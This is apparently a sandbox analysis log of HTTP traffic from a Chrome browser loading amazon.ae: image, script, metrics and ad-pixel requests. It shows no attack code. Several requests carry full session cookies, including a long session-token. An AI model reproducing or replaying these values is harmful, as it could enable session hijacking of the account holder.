AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:1GXSAVZ7MBDVTNT0VYNB$uedata=s:%2Frd%2Fuedata%3Ful%26v%3D0.295223.0%26id%3D1GXSAVZ7MBDVTNT0VYNB%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D1068%26pc0%3D2161%26ld0%3D2161%26t0%3Dundefined%26sc1%3Dportal-bb%26pc1%3D110%26ld1%3D110%26t1%3Dundefined%26sc2%3Dgw-ftGr-desktop-hero-1-visible%26cf2%3D1348%26pc2%3D1349%26ld2%3D1349%26t2%3Dundefined%26sc3%3DheroAf%26cf3%3D1350%26pc3%3D1350%26ld3%3D1350%26t3%3Dundefined%26sc4%3Dh1Af%26cf4%3D1395%26pc4%3D1395%26ld4%3D1395%26t4%3Dundefined%26sc5%3Ddesktop-grid-1-visible%26cf5%3D1403%26pc5%3D1403%26ld5%3D1403%26t5%3Dundefined%26sc6%3Ddesktop-grid-2-visible%26cf6%3D1840%26pc6%3D1840%26ld6%3D1840%26t6%3Dundefined%26sc7%3Ddesktop-grid-3-visible%26cf7%3D1847%26pc7%3D1847%26ld7%3D1847%26t7%3Dundefined%26sc8%3Ddesktop-grid-1-D1-visible%26cf8%3D1848%26pc8%3D1848%26ld8%3D1848%26t8%3Dundefined%26sc9%3Dadplacements%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%26bb9%3D2094%26cf9%3D2094%26be9%3D2094%26pc9%3D2166%26ld9%3D-1723729081618%26t9%3Dundefined%26sc10%3Dadplacements%3AGateway%3Aright-2%3Adesktop%26bb10%3D2094%26cf10%3D2094%26be10%3D2094%26pc10%3D2166%26ld10%3D-1723729081618%26t10%3Dundefined%26sc11%3Ddesktop-grid-4-visible%26cf11%3D2181%26pc11%3D2181%26ld11%3D2181%26t11%3Dundefined%26sc12%3Ddesktop-grid-5-visible%26cf12%3D2185%26pc12%3D2185%26ld12%3D2185%26t12%3Dundefined%26sc13%3Ddesktop-grid-6-visible%26cf13%3D2190%26pc13%3D2190%26ld13%3D2190%26t13%3Dundefined%26sc14%3Ddesktop-grid-7-visible%26cf14%3D2237%26pc14%3D2238%26ld14%3D2238%26t14%3Dundefined%26sc15%3DspLoadJs%26cf15%3D2266%26pc15%3D2266%26ld15%3D2266%26t15%3Dundefined%26sc16%3DnavCF%26cf16%3D2266%26pc16%3D2266%26ld16%3D2266%26t16%3Dundefined%26sc17%3DcsmCELLSframework%26bb17%3D2728%26pc17%3D2728%26ld17%3D2728%26t17%3Dundefined%26sc18%3DcsmCELLSpdm%26bb18%3D2729%26pc18%3D2740%26ld18%3D2740%26t18%3Dundefined%26sc19%3DcsmCELLSvpm%26bb19%3D2740%26pc19%3D2740%26ld19%3D2740%26t19%3Dundefined%26sc20%3DcsmCELLSfem%26bb20%3D2740%26pc20%3D2740%26ld20%3D2740%26t20%3Dundefined%26sc21%3Due_sushi_v1%26bb21%3D2741%26pc21%3D2741%26ld21%3D2741%26t21%3Dundefined%26sc22%3Ddesktop-1-visible%26cf22%3D3413%26pc22%3D3413%26ld22%3D3413%26t22%3Dundefined%26sc23%3Ddesktop-btf-grid-1-visible%26cf23%3D3413%26pc23%3D3413%26ld23%3D3413%26t23%3Dundefined%26sc24%3Ddesktop-btf-grid-2-visible%26cf24%3D3413%26pc24%3D3413%26ld24%3D3413%26t24%3Dundefined%26sc25%3Ddesktop-btf-grid-3-visible%26cf25%3D3413%26pc25%3D3413%26ld25%3D3413%26t25%3Dundefined%26sc26%3Ddesktop-btf-grid-4-visible%26cf26%3D3413%26pc26%3D3413%26ld26%3D3413%26t26%3Dundefined%26sc27%3Ddesktop-3-visible%26cf27%3D5541%26pc27%3D5541%26ld27%3D5541%26t27%3Dundefined%26sc28%3Ddesktop-btf-grid-6-visible%26cf28%3D5608%26pc28%3D5608%26ld28%3D5608%26t28%3Dundefined%26sc29%3Ddesktop-btf-grid-5-visible%26cf29%3D6238%26pc29%3D6238%26ld29%3D6238%26t29%3Dundefined%26sc30%3Ddesktop-btf-grid-7-visible%26cf30%3D6285%26pc30%3D6285%26ld30%3D6285%26t30%3Dundefined%26sc31%3Ddesktop-4-visible%26cf
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/bts24_L2_header_web_en.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81-cKwx9+lL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71qrtZlAzuL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/619pZrUnkWL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61r-8obHj2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61xJcNKKLXL.js?AUIClients/AmazonUIjQuery HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986211_UAE_Budget_Store_AE_xsite_baby_essentials_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334867_186x116_1X_en_AE_1._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b09774kt11_379x304_ae-en._SY116_CB623005781_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Stores/BudgetStore/2404DR14_3__AE_GW_DC_ElectronicsBudget_379x304._SY304_CB554784697_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334873_186x116_1X_en_AE_2._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71VOSLOz4+L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334875_186x116_1X_en_AE_4._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61OaibCCrKL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/xsp/imp?b=RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /x/px/RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf/atf/%7B%22atf%22:true%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/I/61-jK4RR+mL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81ZqHezuUOL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61hmx6dffrL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:943.015625,%22v%22:%7B%22p%22:0,%22t%22:0,%22def%22:%22amzn%22%7D,%22ptv%22:1723729087.293,%22ttv%22:1723729087.293%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /x/px/RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:943.015625,%22v%22:%7B%22p%22:50,%22t%22:1,%22def%22:%22iab%22%7D,%22ptv%22:1723729088.245,%22ttv%22:1723729088.245%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /x/px/RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:943.015625,%22v%22:%7B%22p%22:100,%22t%22:1,%22def%22:%22groupm%22%7D,%22ptv%22:1723729088.246,%22ttv%22:1723729088.246%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/I/61WB26MsoHL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259740_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259756_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259749_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/01rGP6HIADL.js?AUIClients/GenericObservableJS HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31IkFoRynML.js?AUIClients/AmazonGatewayHerotatorJS HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61b6kxdob4L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61nBo0wifmL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61f7uyPypDL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/personalization/ybh/loading-4x-gray._CB485916920_.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31N-r+VYSWL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
